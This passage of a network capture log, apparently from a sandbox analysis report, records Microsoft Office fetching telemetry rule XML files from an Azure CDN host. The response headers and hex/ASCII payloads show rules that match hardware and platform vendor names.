                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            61192.168.2.54978713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 423
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                            x-ms-request-id: a2d01d3c-801e-0083-4800-17f0ae000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd48dfrdj7px744zp8s000000042g00000000kum2
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:58 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            62192.168.2.54976813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 477
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                            x-ms-request-id: c2d0a885-201e-0003-7ced-16f85a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd48qjg85buwfdynm5w00000004e000000000grcc
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:58 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            63192.168.2.54978813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 478
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                            x-ms-request-id: 4dd19665-401e-005b-7705-179c0c000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd4824mj9d6vp65b6n400000004p0000000004e35
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:58 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            64192.168.2.54979013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                            x-ms-request-id: db28b7eb-d01e-0065-5efe-16b77a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd48tnj6wmberkg2xy800000004b000000000txav
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            65192.168.2.54978913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 404
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                            x-ms-request-id: 151ca1e1-401e-0029-2b03-179b43000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd48vhs7r2p1ky7cs5w00000004rg000000008kuz
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            66192.168.2.54979113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:59 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 400
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                            x-ms-request-id: 53f69819-801e-0048-7802-17f3fb000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd48qjg85buwfdynm5w00000004fg00000000c06b
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            67192.168.2.54979213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:59 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 479
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                            x-ms-request-id: 1be548a6-001e-00a2-4166-17d4d5000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd487nf59mzf5b3gk8n000000040g00000000b8xe
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            68192.168.2.54979313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:59 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 425
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                            x-ms-request-id: 678daa67-201e-00aa-3f60-173928000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd48qjg85buwfdynm5w00000004cg00000000nm2w
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            69192.168.2.54979413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:59 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 475
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                            x-ms-request-id: c5dbf9be-001e-0017-2cf1-160c3c000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd48gqrfwecymhhbfm8000000038g000000005wq9
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            70192.168.2.54979513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:59 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:59 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 448
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                            x-ms-request-id: 5e879109-c01e-00a2-3e73-172327000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030859Z-1657d5bbd482krtfgrg72dfbtn000000043000000000f7kx
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:59 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            71192.168.2.54979613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:59 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
